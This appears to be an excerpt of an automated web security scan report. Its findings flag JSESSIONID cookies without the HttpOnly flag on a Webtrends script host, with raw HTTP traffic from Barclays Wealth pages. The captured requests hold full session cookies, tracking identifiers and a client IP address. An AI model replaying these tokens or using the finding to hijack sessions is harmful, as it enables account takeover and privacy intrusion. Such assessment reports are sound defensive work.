Cookie: JSESSIONID=6EDFD59FF31DFFC88DA19690B7FF95B4; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00bb0854; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d016e163d; _wt.mode-79569=fcdcc722e93203b7c335

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:29:50 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=59A67E9E4A42771D4AE9AAE699FFE647; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.42. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue, since without HttpOnly any script running in the page can read it through document.cookie. Review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=83141D1BF679315B3A6FE0130C26720B; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e93200beff43; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:04 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=D8093C1321BCE6A1782156CDD8E84722; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.43. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2aced63bcbecaea3ed3a960df96636a50643ac4c077cfcf2ab2b4f69a511cb2c508b53b6b10fa75491fe117f85cd1bbd2369a14ecbab07e205840fd26e46a93102f57ec24a887e21ebe2728618ac4e9a233620715296e4dcf1a8572a81b9ec9ed08bfac9b1a2795108a59481d1821e170dd71d6f13800cd1520d206bd749c857ede7eaaf12f12b12448f2f341f726fc67610313d28f1b36a7284672840374015395796c7189e9ca4b67db75372df29e6681417736ebfe5ba3207581411e17dd0e092a847da1f059e8c7017f846964d5cfa26ffc752c9a523fedce0690a1930e725a0fc462c39007398946f184cd768caffa56da0c5a1fa0a8c33ff425425572c8fc343095d0056e9b41a1d0b81ba8a120915ede5ef488404e0191c8dcdb69eb66f0d7d1cb54fc2210a2b6eab51b378ce8efe9c0d3660f158911d8584ecbdc3736d516e0ef0ca50cf1c01f6aad100ee9eff758f87ae822e1251aa5625762a176b0c3deb26f07de003dc4d1165609d739e7940960d12892f7d4d3df41a33f7392629e9a88158e21f87e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804009b7a9785aec6aa907369e4ec4b4ecbc6
2181a3139473a185596f6e7c1ee82cc2aff2d32cb37e3f38461430c44548181f829b96e5396a29d5cf195d886516e38add783733d57b251aa8a98393ad4374c6812696d1d3246e205fd7bc5ce04f8a2fc4fd1aa3a119c545fcf0c2f58806f334fcc0978cdb4daeda47f429aa17cbd86b6cb319e5814ad94fa96ff6b845b1b7681589ba7340bf704fcaf8872bf7568a04be232d6ceee90f8d7c1217f46dc71beeb48e8b9ffc57c2054722be6b77f36bc5b30f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3a1b89d73931d54fb7291b05785c68

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue, since without HttpOnly any script running in the page can read it through document.cookie. Review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2aced63bcbecaea3ed3a960df96636a50643ac4c077cfcf2ab2b4f69a511cb2c508b53b6b10fa75491fe117f85cd1bbd2369a14ecbab07e205840fd26e46a93102f57ec24a887e21ebe2728618ac4e9a233620715296e4dcf1a8572a81b9ec9ed08bfac9b1a2795108a59481d1821e170dd71d6f13800cd1520d206bd749c857ede7eaaf12f12b12448f2f341f726fc67610313d28f1b36a7284672840374015395796c7189e9ca4b67db75372df29e6681417736ebfe5ba3207581411e17dd0e092a847da1f059e8c7017f846964d5cfa26ffc752c9a523fedce0690a1930e725a0fc462c39007398946f184cd768caffa56da0c5a1fa0a8c33ff425425572c8fc343095d0056e9b41a1d0b81ba8a120915ede5ef488404e0191c8dcdb69eb66f0d7d1cb54fc2210a2b6eab51b378ce8efe9c0d3660f158911d8584ecbdc3736d516e0ef0ca50cf1c01f6aad100ee9eff758f87ae822e1251aa5625762a176b0c3deb26f07de003dc4d1165609d739e7940960d12892f7d4d3df41a33f7392629e9a88158e21f87e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804009b7a9785aec6aa907369e4ec4b4ecbc62181a3139473a185596f6e7c1ee82cc2aff2
d32cb37e3f38461430c44548181f829b96e5396a29d5cf195d886516e38add783733d57b251aa8a98393ad4374c6812696d1d3246e205fd7bc5ce04f8a2fc4fd1aa3a119c545fcf0c2f58806f334fcc0978cdb4daeda47f429aa17cbd86b6cb319e5814ad94fa96ff6b845b1b7681589ba7340bf704fcaf8872bf7568a04be232d6ceee90f8d7c1217f46dc71beeb48e8b9ffc57c2054722be6b77f36bc5b30f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3a1b89d73931d54fb7291b05785c68 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/brokerage.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=DD03FBD6C5716741DEF4FC9264E5B178; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; _wt.mode-79569=fcdcc722e93202cf02d7

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:09 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1DB1B8506FA734F3D0691621AC32919E; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.44. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91e2a0efa36ac84fe5603ea1084fb20b5110e3f2d96a0830e5669c6335d107f5b279d0038afc0b2c92c519ef216efd1295a053fb009010c10078e57c59f26cc1098a3427a3e6729e19a91c9920397c715895f495eb943b6a94e7ba8e8c91f3d8aab9143c44e49acbcb8f0d1740de4d3d1dd305dd52532473d4569c4aabf0b0f558e63a0955e43b24556129c6365831657bf4ec7d70c46323403441156c01c6954bc5cba7e57ee1537c8f29b73a414c7269e9e6ee3407591f11bb7ed6b1caff13d91f509eda221dad45c34c0cf87ffbc400c9a770aedeb26d5c4237b372f5fa4d2e390773cbc46b151f9077da91975687f3d5ef569b3ba201196669169b81480b495e40bdfb4e1f0887ba8d170815edaae64b8252b71916d4c1b987e4645e2e1eb94599210a363cae58b67e918ef4940e2967e2408a24bc93a9e3966733176d16f087009a0153f0a9de0db4c4f7298f9cbb9917791dea597e3224533f1b29f0189c6cf157c30b1c7165d221cf711693061ed02f72513cf8073fd519140cca99814ee22994b051a8eed2abb52957ac7babc8f33ed77262068caf0e18c1670659ee15107f88a247a9eaf9bf708443774ac143178f749fd3adcdedcf373fbfe24e1ccec4
7186fb18c122a48b5e6c3e7019e47f96a9a7882ee7796d3043123096441e1a1882cbc6e66e342485ce1258893910e3dc8478376682747748a0f88295f6117196d774ca84d0723b7b5284bb59b648db72c6ff4ea0a44b9411fbfac5a1d105f767f394918cd94efd8843ff78ab4b9c886d6cb141ef811e8014a168a5ef4ab1e669408ebb7110e57c48cbaa8226f001d45fbc232a6ebce008862c4040a73fc348bfb5848ec8ae07c2044027be317ef43accb61b5a6d762ed8133a92a5a64063f21795c1b1df419f6f1fa2a0d89d8e71ac8a262e3d4edad63b64db4fb7291b01cbfec7

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue, since without HttpOnly any script running in the page can read it through document.cookie. Review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91e2a0efa36ac84fe5603ea1084fb20b5110e3f2d96a0830e5669c6335d107f5b279d0038afc0b2c92c519ef216efd1295a053fb009010c10078e57c59f26cc1098a3427a3e6729e19a91c9920397c715895f495eb943b6a94e7ba8e8c91f3d8aab9143c44e49acbcb8f0d1740de4d3d1dd305dd52532473d4569c4aabf0b0f558e63a0955e43b24556129c6365831657bf4ec7d70c46323403441156c01c6954bc5cba7e57ee1537c8f29b73a414c7269e9e6ee3407591f11bb7ed6b1caff13d91f509eda221dad45c34c0cf87ffbc400c9a770aedeb26d5c4237b372f5fa4d2e390773cbc46b151f9077da91975687f3d5ef569b3ba201196669169b81480b495e40bdfb4e1f0887ba8d170815edaae64b8252b71916d4c1b987e4645e2e1eb94599210a363cae58b67e918ef4940e2967e2408a24bc93a9e3966733176d16f087009a0153f0a9de0db4c4f7298f9cbb9917791dea597e3224533f1b29f0189c6cf157c30b1c7165d221cf711693061ed02f72513cf8073fd519140cca99814ee22994b051a8eed2abb52957ac7babc8f33ed77262068caf0e18c1670659ee15107f88a247a9eaf9bf708443774ac143178f749fd3adcdedcf373fbfe24e1ccec47186fb18c122a48b5e6c3e7019e47f96a9a7
882ee7796d3043123096441e1a1882cbc6e66e342485ce1258893910e3dc8478376682747748a0f88295f6117196d774ca84d0723b7b5284bb59b648db72c6ff4ea0a44b9411fbfac5a1d105f767f394918cd94efd8843ff78ab4b9c886d6cb141ef811e8014a168a5ef4ab1e669408ebb7110e57c48cbaa8226f001d45fbc232a6ebce008862c4040a73fc348bfb5848ec8ae07c2044027be317ef43accb61b5a6d762ed8133a92a5a64063f21795c1b1df419f6f1fa2a0d89d8e71ac8a262e3d4edad63b64db4fb7291b01cbfec7 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=245968D340BB5968593028CAA74B029E; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; _wt.mode-79569=fcdcc722e932033a5f6d; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:11 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=03955303B3331E793004A3981BAFE30B; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.45. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/debit-cards.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4B58DD7DB5603E2D9048FE4EA69A8782; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200599559; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=fcdcc722e9320537bb59

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:15 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A3D550880A45CA7718800D08622321F7; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.46. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=366C424481F456C6E4820AE57695F69C; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d01953baa; _wt.mode-79569=fcdcc722e93200feed40

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:13 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=461B874546EDC251C6A7440F7F10048D; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.47. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504097cbad24c4491d2a045edacbe7667b7643201395ddd85935675175c2e3597d81ec7f77c301528f0861619836210bd15e01494161f679046cd3ea440fb65c7801b6cdb15c0785ae23675645c05656ca824ea267721a956b4efe2a70bb4a76e10e7dd20fd29b3a81b5750cdf2a0cc8797498b0d77d29a74fbf96b7b6e3c60a8857ef6a272aa8452aec9d28be22b017eee772082045063f7e71611fc50474a14b96c5ab6704433fe2c1924450cbb12cc6dc90af1baf8eb7312f98881c095128342ff6ebd195c91f75d256f50ac52435d87d5eec6987458d691f829e41c42bb155bb08fcd5bd1f74fc32416419512e7cb5a6cd89db8810cdfa0a51c643857d59951e507d1400b9b073b6ab3b36c8eaffeb0f929970df96436a30b4fa6470879f0efba452729e84590365c8753a7ac1acd32ddb2443389c60abd3a6dab46c4a608f50c9e15de0037ed6b1ae3319b1bcb723ee78c35dc07ea0cc864222e705f96ffd2e9d56d66cce5eb8ad9c8ad8aafe3123b4ab7c9cfcad9054541d04d6612d704df5a022577d15ecc48aaf2e4a950b26f0b05e66a7702622fc0625c313579f3bd79799735204a6510146c52939f4ccd9df3e32fb15379db23b73344102a3eeae3eb3751524747b92984b3c5ad41dd4a57ce8e2316fd42cb4c09ae70fb970ecda573add4e4390d4333b37ba6fb487f3a5629cc933a1a4680689efff139f492a0fc588034a0410477017f8a91175c5f0703e9e61c1b0b8ebadb470b46e8bdee41d551bb144dd49fbbcfb06257204ab318c420597c3aab5de028ca8ead9c0c6361a45dc91dc1caffd1833127563356b0db5ec60255faaddf01a089ae4e888fd6cb384a11d05b6a436a147e0b449029e123a75f8010173061ce75992612c40813de24754e6cef0f27c55d400e8a8f9604f546d5f449a6b580f